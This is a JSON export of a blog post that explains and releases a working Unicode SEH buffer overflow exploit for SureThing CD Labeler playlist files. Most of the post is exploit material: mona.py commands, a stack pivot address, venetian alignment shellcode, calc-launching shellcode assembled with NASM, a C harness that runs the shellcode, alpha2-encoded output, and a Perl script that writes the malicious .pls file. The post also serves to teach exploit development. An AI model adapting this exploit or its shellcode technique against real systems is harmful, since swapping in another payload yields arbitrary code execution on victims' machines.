{"id":307,"date":"2011-08-02T23:24:43","date_gmt":"2011-08-02T22:24:43","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=307"},"modified":"2013-03-20T22:17:20","modified_gmt":"2013-03-20T21:17:20","slug":"surething-labeler-playlist-buffer-overflow-unicode-exploit","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=307","title":{"rendered":"SureThing Labeler Playlist Buffer Overflow UNICODE Exploit"},"content":{"rendered":"<p>This vulnerability I had discovered a couple of years ago but never got round to writing an exploit for it till recently, after studying Peter Van Eeckhoutte&#8217;s excellent exploit writing tutorial &#8220;Unicode \u2013 from 0x00410041 to calc&#8221;. In this vulnerability, when data is parsed from the playlist file it gets converted to Unicode before being placed on the stack. That is why we see the hex value 0x00410041 instead of 0x4141 when, say, AA is parsed.<\/p>\n<p>So what is Unicode? It is a standard for encoding characters. There are various Unicode encodings using 8, 16 or 32 bits (UTF-8, UTF-16 or UTF-32). UTF-16 is the most common encoding scheme and the one used for native Unicode encoding on Windows operating systems. The reason Unicode is used is that with, say, 2 bytes (16 bits) it gives us 65,536 (2^16) possible combinations, covering every character, symbol, etc. of all the languages around the world. If ASCII were used we would be limited to 128 possible combinations (2^7), as it uses 7 bits per character.<\/p>\n<p>For this vulnerability the offsets are shown below:<\/p>\n<p>[BUFFER x 264 bytes] + [NSEH] + [SEH] + [BUFFER x 227]<\/p>\n<p>Since this is a Unicode buffer overflow vulnerability, we have only 2 bytes each for our SEH pointers. 
Opening the executable or attaching to the process in Immunity Debugger and then using the mona.py script, we can run a number of commands.<\/p>\n<p>To list all loaded modules, filtering out the OS modules:<\/p>\n<pre>&gt;!mona modules -cm os=false<\/pre>\n<p><a href=\"\/images\/stcdlogdata.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/stcdlogdata.png\" width=\"524\" height=\"198\" \/><\/a><\/p>\n<p>To list all pointers that could be used in our SEH overwrite, using the &#8220;seh&#8221; command:<\/p>\n<pre>&gt;!mona seh -cp unicode -cm rebase=true,aslr=false,safeseh=false,nx=false<\/pre>\n<p>Unfortunately a couple of the addresses found did point back to our NSEH but could not be walked through, as an exception was triggered.<\/p>\n<p>Turning to the &#8220;stackpivot&#8221; command listed a number of possible addresses. After testing a few of them, one worked perfectly, pointing back to NSEH and walking through without raising any exceptions.<\/p>\n<pre>&gt;!mona stackpivot -cp unicode -cm rebase=true,aslr=false,safeseh=false,nx<\/pre>\n<pre style=\"text-align: left;\">0x002f00c8 : {pivot 24} # POP EDI # POP ESI # POP EBX # ADD ESP,0C # RETN<\/pre>\n<p>This address, 0x002f00c8 in module LTIMG13N.dll, does take us back to our NSEH pointer, though not before running through some unwanted instructions, which did no harm to our stack.<br \/>\nBelow we can see our SEH address and the instructions it carries out. 
After landing back at our NSEH we see the instructions further below as execution walks through them.<\/p>\n<pre># SEH address instructions<\/pre>\n<pre>002F00C8   5F               POP EDI\r\n002F00C9   5E               POP ESI\r\n002F00CA   5B               POP EBX\r\n002F00CB   83C4 0C          ADD ESP,0C\r\n002F00CE   C3               RETN<\/pre>\n<pre># NSEH and SEH walk instructions<\/pre>\n<pre>0013beb4   41               inc     ecx\r\n0013beb5   004100           add     byte ptr [ecx],al\r\n0013beb8   c8002f00         enter   2F00h,0<\/pre>\n<p>Once through these instructions we need to place some venetian shellcode to align our chosen base register, as required for our Unicode-encoded shellcode. After walking through the previous instructions our EBX register points near our buffer, so we use this to our advantage (EBX + 30h). The venetian shellcode below aligns EAX to point to our shellcode. In this case it points to the buffer area before the SEH pointers, to be precise 8 bytes from the start. 
The reason is that we have more space to play with there than after the SEH pointers.<\/p>\n<pre># 15 bytes of venetian shellcode<\/pre>\n<pre>\"\\x53\".         # push ebx              # put the address in ebx on the stack\r\n\"\\x41\".         # add byte ptr [ecx],al # align\r\n\"\\x58\".         # pop eax               # get the address of ebx, place it in eax\r\n\"\\x41\".         # add byte ptr [ecx],al # align\r\n\"\\x05\\x01\\x30\". # add eax, 0x30000100   # align and add to eax\r\n\"\\x41\".         # add byte ptr [ecx],al # align\r\n\"\\x2d\\x03\\x30\". # sub eax, 0x30000300   # align and sub from eax, net decrease of 0x200\r\n\"\\x41\".         # add byte ptr [ecx],al # align\r\n\"\\x50\". 
        # push eax              # push eax onto the stack\r\n\"\\x41\".         # add byte ptr [ecx],al # align\r\n\"\\xc3\";         # retn                  # return to the address in eax<\/pre>\n<p>The image shows our instructions with the nulls interleaved.<\/p>\n<p><a href=\"\/images\/stcddebug.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/stcddebug.png\" width=\"533\" height=\"571\" \/><\/a><\/p>\n<p>So now our offsets are like this:<\/p>\n<p>[8 bytes] + [256 bytes for our unicode shellcode] + [NSEH] + [SEH] + [VENETIAN SHELLCODE]<\/p>\n<p>256 bytes is still not a great deal of space for a decent piece of shellcode, so I&#8217;m using a custom shellcode with hardcoded addresses. There are other ways, like using an egghunter shellcode in this space and then placing the shellcode somewhere else in memory, but for this POC exploit I&#8217;m not using an egghunter.<\/p>\n<p>Using the Netwide Assembler tools, assembling the code below outputs the file shellcalc.bin:<\/p>\n<pre>&gt;nasmw -f bin -o shellcalc.bin shellcalc.asm<\/pre>\n<pre>[BITS 32]\r\npush byte 0\r\npush dword \"    \"\r\npush dword \"calc\"\r\nmov  eax,esp\r\npush eax\r\nmov  eax,0x7c86250d   ; WinExec() WinXP SP3 kernel32.dll\r\ncall eax\r\nxor  eax,eax\r\npush eax\r\nmov  eax,0x77c39e7e   ; exit() WinXP SP3 msvcrt.dll\r\ncall eax<\/pre>\n<p>Once assembled we can disassemble shellcalc.bin to obtain our opcodes:<\/p>\n<pre>&gt;ndisasmw shellcalc.bin -b 32<\/pre>\n<pre>00000000  6A00              push byte +0x0\r\n00000002  6820202020        push dword 0x20202020\r\n00000007  
6863616C63        push dword 0x636c6163\r\n0000000C  89E0              mov eax,esp\r\n0000000E  50                push eax\r\n0000000F  B80D25867C        mov eax,0x7c86250d\r\n00000014  FFD0              call eax\r\n00000016  31C0              xor eax,eax\r\n00000018  50                push eax\r\n00000019  B87E9EC377        mov eax,0x77c39e7e\r\n0000001E  FFD0              call eax<\/pre>\n<p>Finally, to test that our shellcode works, we can compile the C code below:<\/p>\n<pre>#include &lt;stdio.h&gt;\r\n#include &lt;windows.h&gt;\r\n\r\nunsigned char shell[] =\r\n\"\\x6A\\x00\"                \/\/ push byte 0\r\n\"\\x68\\x20\\x20\\x20\\x20\"    \/\/ push dword \"    \"\r\n\"\\x68\\x63\\x61\\x6c\\x63\"    \/\/ push dword \"calc\"\r\n\"\\x8B\\xC4\"                \/\/ mov  eax,esp\r\n\"\\x50\"                    \/\/ push eax\r\n\"\\xB8\\x0d\\x25\\x86\\x7c\"    \/\/ mov  eax,0x7c86250d\r\n\"\\xFF\\xD0\"                \/\/ call 
eax\r\n\"\\x31\\xc0\"                \/\/ xor  eax,eax\r\n\"\\x50\"                    \/\/ push eax\r\n\"\\xB8\\x7e\\x9e\\xC3\\x77\"    \/\/ mov  eax,0x77c39e7e\r\n\"\\xFF\\xD0\";               \/\/ call eax\r\n\r\nint main()\r\n{\r\n  HINSTANCE LibHandle;\r\n  int (*funct)();\r\n  \/\/ make sure msvcrt.dll is loaded: the shellcode's hardcoded exit() address lives there\r\n  LibHandle = LoadLibrary(\"msvcrt.dll\");\r\n  printf(\"\\nShellcode size is: %d bytes\\n\", sizeof(shell)-1);\r\n  printf(\"\\nRunning shellcode . . .\\n\\n\");\r\n  funct = (int (*)()) shell;\r\n  (*funct)();\r\n  return 0;\r\n}<\/pre>\n<p>Once our shellcode has run successfully, loading Windows Calculator, we can convert it to Unicode. To do this we use SkyLined&#8217;s alpha2.exe tool:<\/p>\n<pre>&gt;alpha2 --unicode eax &lt; shellcalc.bin<\/pre>\n<p>This prints to screen our ASCII shellcode, which when placed on the stack gets converted to Unicode. 
The size of this shellcode is now 189 bytes from our original 32 bytes of shellcode.<\/p>\n<p>So our final layout is like this<\/p>\n<p>[8 bytes] + [189 bytes unicode shellcode] + [67 bytes] + [NSEH] + [SEH] + [VENETIAN SHELLCODE]<\/p>\n<p>and our final exploit code in Perl is<\/p>\n<pre>my $file = \"stcdexp.pls\";\r\nmy $nseh = \"\\x41\\x41\";\u00a0\u00a0\u00a0\u00a0\u00a0\r\nmy $seh\u00a0 = \"\\xC8\\x2F\";\u00a0\u00a0\u00a0\u00a0\u00a0\r\nmy $buf1 = \"\\x41\" x 8;\r\nmy $buf2 = \"\\x42\" x 67;\r\nmy $buf3 = \"\\x43\" x 227;\u00a0\u00a0\u00a0 # added at the end but not needed<\/pre>\n<pre># 15 bytes of venetian shellcode<\/pre>\n<pre>my $venetian =\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # put the address ebx on stack\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x58\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # pop eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # get address of ebx place in eax\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x05\\x01\\x30\". # add eax, 0x30000100\u00a0\u00a0 # align and add to eax\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x2d\\x03\\x30\". # sub eax, 0x30000300\u00a0\u00a0 # align and sub to eax dec by 200\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\x50\". 
\u00a0       # push eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push eax in stack\r\n\"\\x41\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # add byte ptr [ecx],al # align\r\n\"\\xc3\"; \u00a0       # retn\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax<\/pre>\n<pre># alpha2 --unicode eax &lt; shellcalc.bin<\/pre>\n<pre>my $shellcode =\r\n\"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARA\".\r\n\"LAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQI\".\r\n\"AIQI111AIAJQYAZBABABABABkMAGB9u4JBpjm0rHMPO0k\".\r\n\"pKpQXrCQQRLc31ywpPPFXLMleQvSLYoVplqWPpPDx1nsn\".\r\n\"i3rWKOFpA\";<\/pre>\n<pre>my $exp = $buf1 . $shellcode . $buf2 . $nseh . $seh . $venetian . $buf3;<\/pre>\n<pre>open($FILE,\"&gt;$file\");\r\nprint $FILE $exp;\r\nclose($FILE);\r\nprint \"pls File Created successfully\\n\";<\/pre>\n<p>&nbsp;<\/p>\n<p>This exploit has been tested on the trial version 5.1.616.<\/p>\n<p>References:<\/p>\n<p><a href=\"http:\/\/secunia.com\/advisories\/35361\/\" target=\"_blank\">http:\/\/secunia.com\/advisories\/35361\/<\/a><br \/>\n<a href=\"http:\/\/msdn.microsoft.com\/en-us\/library\/dd374081.aspx\" target=\"_blank\">http:\/\/msdn.microsoft.com\/en-us\/library\/dd374081.aspx<\/a><br \/>\n<a href=\"http:\/\/www.corelan.be\/index.php\/2009\/11\/06\/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc\/\" target=\"_blank\">http:\/\/www.corelan.be\/index.php\/2009\/11\/06\/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This vulnerability I had discovered a couple of years ago but never got round in writing an exploit for it till recently after studying Peter Van Eeckhoutte&#8217;s excellent exploit writing tutorial &#8220;Unicode \u2013 from 0\u00d700410041 to calc&#8221;. 
In this vulnerability when data is parsed from the playlist file it gets converted to Unicode before being [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,7,6],"tags":[29],"class_list":["post-307","post","type-post","status-publish","format-standard","hentry","category-all","category-exploits","category-vulnerabilities","tag-surething"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=307"}],"version-history":[{"count":54,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/307\/revisions"}],"predecessor-version":[{"id":416,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/307\/revisions\/416"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}